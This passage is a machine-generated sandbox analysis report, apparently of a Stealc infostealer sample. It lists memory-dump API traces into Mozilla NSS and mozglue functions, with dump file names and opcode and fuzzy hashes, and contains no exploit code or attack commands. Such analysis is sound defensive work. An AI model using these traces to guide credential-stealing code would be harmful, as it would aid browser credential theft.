                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                                                                            • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                                                                            • API String ID: 601260978-871931242
                                                                                                                                                                            • Opcode ID: c576707eea995c385e2f7f77470459bd9b5d4701988277ea38e990c18b4f5577
                                                                                                                                                                            • Instruction ID: 019504f6db06b4570124ee1e7b5f1c8f8ea0956a42db37b2278bb8c7888510d0
                                                                                                                                                                            • Opcode Fuzzy Hash: c576707eea995c385e2f7f77470459bd9b5d4701988277ea38e990c18b4f5577
                                                                                                                                                                            • Instruction Fuzzy Hash: D811E6E5F0311112EB11EA793C40AAE386C5B5710CF680934E819E2F80FB25C52887F7
                                                                                                                                                                            APIs
                                                                                                                                                                            • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6C9A13BC,?,?,?,6C9A1193), ref: 6C9A1C6B
                                                                                                                                                                            • PR_NewLock.NSS3(?,6C9A1193), ref: 6C9A1C7E
                                                                                                                                                                              • Part of subcall function 6C9598D0: calloc.MOZGLUE(00000001,00000084,6C880936,00000001,?,6C88102C), ref: 6C9598E5
                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000,?,6C9A1193), ref: 6C9A1C91
                                                                                                                                                                              • Part of subcall function 6C87BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C8821BC), ref: 6C87BB8C
                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000,?,?,6C9A1193), ref: 6C9A1CA7
                                                                                                                                                                              • Part of subcall function 6C87BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C87BBEB
                                                                                                                                                                              • Part of subcall function 6C87BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C87BBFB
                                                                                                                                                                              • Part of subcall function 6C87BB80: GetLastError.KERNEL32 ref: 6C87BC03
                                                                                                                                                                              • Part of subcall function 6C87BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C87BC19
                                                                                                                                                                              • Part of subcall function 6C87BB80: free.MOZGLUE(00000000), ref: 6C87BC22
                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000,?,?,?,6C9A1193), ref: 6C9A1CBE
                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000,?,?,?,?,6C9A1193), ref: 6C9A1CD4
                                                                                                                                                                            • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6C9A1193), ref: 6C9A1CFE
                                                                                                                                                                            • PR_Lock.NSS3(?,?,?,?,?,?,?,6C9A1193), ref: 6C9A1D1A
                                                                                                                                                                              • Part of subcall function 6C959BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C881A48), ref: 6C959BB3
                                                                                                                                                                              • Part of subcall function 6C959BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C881A48), ref: 6C959BC8
                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6C9A1193), ref: 6C9A1D3D
                                                                                                                                                                              • Part of subcall function 6C93DD70: TlsGetValue.KERNEL32 ref: 6C93DD8C
                                                                                                                                                                              • Part of subcall function 6C93DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C93DDB4
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE890,00000000,?,6C9A1193), ref: 6C9A1D4E
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6C9A1193), ref: 6C9A1D64
                                                                                                                                                                            • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6C9A1193), ref: 6C9A1D6F
                                                                                                                                                                            • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6C9A1193), ref: 6C9A1D7B
                                                                                                                                                                            • PR_DestroyCondVar.NSS3(?,?,?,?,?,6C9A1193), ref: 6C9A1D87
                                                                                                                                                                            • PR_DestroyCondVar.NSS3(00000000,?,?,?,6C9A1193), ref: 6C9A1D93
                                                                                                                                                                            • PR_DestroyLock.NSS3(00000000,?,?,6C9A1193), ref: 6C9A1D9F
                                                                                                                                                                            • free.MOZGLUE(00000000,?,6C9A1193), ref: 6C9A1DA8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3246495057-0
                                                                                                                                                                            • Opcode ID: b70a89c45a14aba44da0cff9de10671bb8da7cd775d6a4e8e053e0cef06b8876
                                                                                                                                                                            • Instruction ID: 427d4974863fc6c2d0aeb3d360257731d2af7520106c5959ca340891465f9894
                                                                                                                                                                            • Opcode Fuzzy Hash: b70a89c45a14aba44da0cff9de10671bb8da7cd775d6a4e8e053e0cef06b8876
                                                                                                                                                                            • Instruction Fuzzy Hash: DE31DBF5D007119BEB209F69AC41A6B76E8AF1660DF140839D84A87F41F731E419CBA2
                                                                                                                                                                            APIs
                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6C8F5EC0,00000000,?,?), ref: 6C8F5CBE
                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6C8F5CD7
                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C8F5CF0
                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C8F5D09
                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6C8F5EC0,00000000,?,?), ref: 6C8F5D1F
                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6C8F5D3C
                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8F5D51
                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8F5D66
                                                                                                                                                                            • PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6C8F5D80
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: strncmp$SecureStrdup_Util
                                                                                                                                                                            • String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
                                                                                                                                                                            • API String ID: 1171493939-3017051476
                                                                                                                                                                            • Opcode ID: 16e17c84d07b0637f55d72e8c5ffeff8b8fe66009ee126a0f76a38cb84109ff1
                                                                                                                                                                            • Instruction ID: 8e51dc18b69e40823be813578af915f9fe92d47dc18964315e07e57fe8d21a74
                                                                                                                                                                            • Opcode Fuzzy Hash: 16e17c84d07b0637f55d72e8c5ffeff8b8fe66009ee126a0f76a38cb84109ff1
                                                                                                                                                                            • Instruction Fuzzy Hash: E2312EA07433015BE7702E249D5DB763758AF017CAF254C34EDB9E6681E771D502C271
                                                                                                                                                                            APIs
                                                                                                                                                                            • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C9C1DE0,?), ref: 6C8F6CFE
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8F6D26
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C8F6D70
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000480), ref: 6C8F6D82
                                                                                                                                                                            • DER_GetInteger_Util.NSS3(?), ref: 6C8F6DA2
                                                                                                                                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C8F6DD8
                                                                                                                                                                            • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C8F6E60
                                                                                                                                                                            • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C8F6F19
                                                                                                                                                                            • PK11_DigestBegin.NSS3(00000000), ref: 6C8F6F2D
                                                                                                                                                                            • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C8F6F7B
                                                                                                                                                                            • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C8F7011
                                                                                                                                                                            • PK11_FreeSymKey.NSS3(00000000), ref: 6C8F7033
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8F703F
                                                                                                                                                                            • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C8F7060
                                                                                                                                                                            • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C8F7087
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C8F70AF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2108637330-0
                                                                                                                                                                            • Opcode ID: 4922bf47a0d503a79218411e44f4b6012222a95d7dbe9cab7697f0ebf04b2ae7
                                                                                                                                                                            • Instruction ID: 4947177443eed0f215cc07e74f691a2218e3a9ddb30b5b80b6beae49dc31f702
                                                                                                                                                                            • Opcode Fuzzy Hash: 4922bf47a0d503a79218411e44f4b6012222a95d7dbe9cab7697f0ebf04b2ae7
                                                                                                                                                                            • Instruction Fuzzy Hash: D1A108729182019BFB209F24DE41B5A32A4DB8139CF244F39E978CBB81E775D856C753
                                                                                                                                                                            APIs
                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,6C89AB95,00000000,?,00000000,00000000,00000000), ref: 6C8BAF25
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,6C89AB95,00000000,?,00000000,00000000,00000000), ref: 6C8BAF39
                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,6C89AB95,00000000,?,00000000,00000000,00000000), ref: 6C8BAF51
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C89AB95,00000000,?,00000000,00000000,00000000), ref: 6C8BAF69
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C8BB06B
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C8BB083
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8BB0A4
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C8BB0C1
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000), ref: 6C8BB0D9
                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6C8BB102
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8BB151
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8BB182
                                                                                                                                                                              • Part of subcall function 6C8EFAB0: free.MOZGLUE(?,-00000001,?,?,6C88F673,00000000,00000000), ref: 6C8EFAC7
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C8BB177
                                                                                                                                                                              • Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C89AB95,00000000,?,00000000,00000000,00000000), ref: 6C8BB1A2
                                                                                                                                                                            • PR_GetCurrentThread.NSS3(?,?,?,?,6C89AB95,00000000,?,00000000,00000000,00000000), ref: 6C8BB1AA
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C89AB95,00000000,?,00000000,00000000,00000000), ref: 6C8BB1C2
                                                                                                                                                                              • Part of subcall function 6C8E1560: TlsGetValue.KERNEL32(00000000,?,6C8B0844,?), ref: 6C8E157A
                                                                                                                                                                              • Part of subcall function 6C8E1560: EnterCriticalSection.KERNEL32(?,?,?,6C8B0844,?), ref: 6C8E158F
                                                                                                                                                                              • Part of subcall function 6C8E1560: PR_Unlock.NSS3(?,?,?,?,6C8B0844,?), ref: 6C8E15B2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4188828017-0
                                                                                                                                                                            • Opcode ID: f4f81896a57ad4005b412059a1dfad5d946b118544671dcef16220d1d27693e7
                                                                                                                                                                            • Instruction ID: 027aa27efa2db18bb906b955cc80890b77415c3e60f33087226905b63ef20b41
                                                                                                                                                                            • Opcode Fuzzy Hash: f4f81896a57ad4005b412059a1dfad5d946b118544671dcef16220d1d27693e7
                                                                                                                                                                            • Instruction Fuzzy Hash: 1BA1B1B1D002059FEF109FA8DD81AFE7BB4AF19308F144924E809A6751E731E959CBA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C90ADB1
                                                                                                                                                                              • Part of subcall function 6C8EBE30: SECOID_FindOID_Util.NSS3(6C8A311B,00000000,?,6C8A311B,?), ref: 6C8EBE44
                                                                                                                                                                            • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C90ADF4
                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C90AE08
                                                                                                                                                                              • Part of subcall function 6C8EB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9C18D0,?), ref: 6C8EB095
                                                                                                                                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C90AE25
                                                                                                                                                                            • PL_FreeArenaPool.NSS3 ref: 6C90AE63
                                                                                                                                                                            • PR_CallOnce.NSS3(6C9F2AA4,6C8F12D0), ref: 6C90AE4D
                                                                                                                                                                              • Part of subcall function 6C814C70: TlsGetValue.KERNEL32(?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814C97
                                                                                                                                                                              • Part of subcall function 6C814C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814CB0
                                                                                                                                                                              • Part of subcall function 6C814C70: PR_Unlock.NSS3(?,?,?,?,?,6C813921,6C9F14E4,6C95CC70), ref: 6C814CC9
                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C90AE93
                                                                                                                                                                            • PR_CallOnce.NSS3(6C9F2AA4,6C8F12D0), ref: 6C90AECC
                                                                                                                                                                            • PL_FreeArenaPool.NSS3 ref: 6C90AEDE
                                                                                                                                                                            • PL_FinishArenaPool.NSS3 ref: 6C90AEE6
                                                                                                                                                                            • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C90AEF5
                                                                                                                                                                            • PL_FinishArenaPool.NSS3 ref: 6C90AF16
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                                                                            • String ID: security
                                                                                                                                                                            • API String ID: 3441714441-3315324353
                                                                                                                                                                            • Opcode ID: d71f4041faa989ce09125e2c6e6e1d9e0dad6af0482359e8970ffb77699545bc
                                                                                                                                                                            • Instruction ID: 35d73fe70d954ad968555bd07987c2fe94deff9f1811fd73587be4d3c0419a65
                                                                                                                                                                            • Opcode Fuzzy Hash: d71f4041faa989ce09125e2c6e6e1d9e0dad6af0482359e8970ffb77699545bc
                                                                                                                                                                            • Instruction Fuzzy Hash: CA4118B1A04210A7E7209B289C45BAB33ADAF9231CF140939E96496F41FF35D619C7D3
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 6C922BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C922A28,00000060,00000001), ref: 6C922BF0
                                                                                                                                                                              • Part of subcall function 6C922BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C922A28,00000060,00000001), ref: 6C922C07
                                                                                                                                                                              • Part of subcall function 6C922BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C922A28,00000060,00000001), ref: 6C922C1E
                                                                                                                                                                              • Part of subcall function 6C922BE0: free.MOZGLUE(?,00000000,00000000,?,6C922A28,00000060,00000001), ref: 6C922C4A
                                                                                                                                                                            • free.MOZGLUE(?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000,?,6C9280C1), ref: 6C925D0F
                                                                                                                                                                            • free.MOZGLUE(?,?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000,?,6C9280C1), ref: 6C925D4E
                                                                                                                                                                            • free.MOZGLUE(?,?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000,?,6C9280C1), ref: 6C925D62
                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000,?,6C9280C1), ref: 6C925D85
                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000,?,6C9280C1), ref: 6C925D99
                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000,?,6C9280C1), ref: 6C925DFA
                                                                                                                                                                            • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000,?,6C9280C1), ref: 6C925E33
                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C925E3E
                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C925E47
                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000,?,6C9280C1), ref: 6C925E60
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6C92AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C925E78
                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,6C92AAD4), ref: 6C925EB9
                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,6C92AAD4), ref: 6C925EF0
                                                                                                                                                                            • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C92AAD4), ref: 6C925F3D
                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C92AAD4), ref: 6C925F4B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4273776295-0
                                                                                                                                                                            • Opcode ID: 04e71d32654363a89191092998f3dc31704dee9b5d71bb9b74b1227439906533
                                                                                                                                                                            • Instruction ID: 682be3e4acb86c8764ebae831b249f4d02f89c4654fb9458bb1d30f969130a06
                                                                                                                                                                            • Opcode Fuzzy Hash: 04e71d32654363a89191092998f3dc31704dee9b5d71bb9b74b1227439906533
                                                                                                                                                                            • Instruction Fuzzy Hash: 7071E2B4A04B009FD710DF24D884A92B7F9FF99308F148528E8AE87B15EB35F915CB91
                                                                                                                                                                            APIs
                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?), ref: 6C8A8E22
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C8A8E36
                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6C8A8E4F
                                                                                                                                                                            • calloc.MOZGLUE(00000001,?,?,?), ref: 6C8A8E78
                                                                                                                                                                            • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C8A8E9B
                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C8A8EAC
                                                                                                                                                                            • PL_ArenaAllocate.NSS3(?,?), ref: 6C8A8EDE
                                                                                                                                                                            • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C8A8EF0
                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6C8A8F00
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8A8F0E
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6C8A8F39
                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6C8A8F4A
                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6C8A8F5B
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8A8F72
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8A8F82
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1569127702-0
                                                                                                                                                                            • Opcode ID: 757f2926a0dbb5fe1eb16ed226918e486fe784eb530262e567c563d91df9d71e
                                                                                                                                                                            • Instruction ID: a28dfdaba8af10f0a3d775988741362b19db2ce7a0d8b16e64fe523fb775a12b
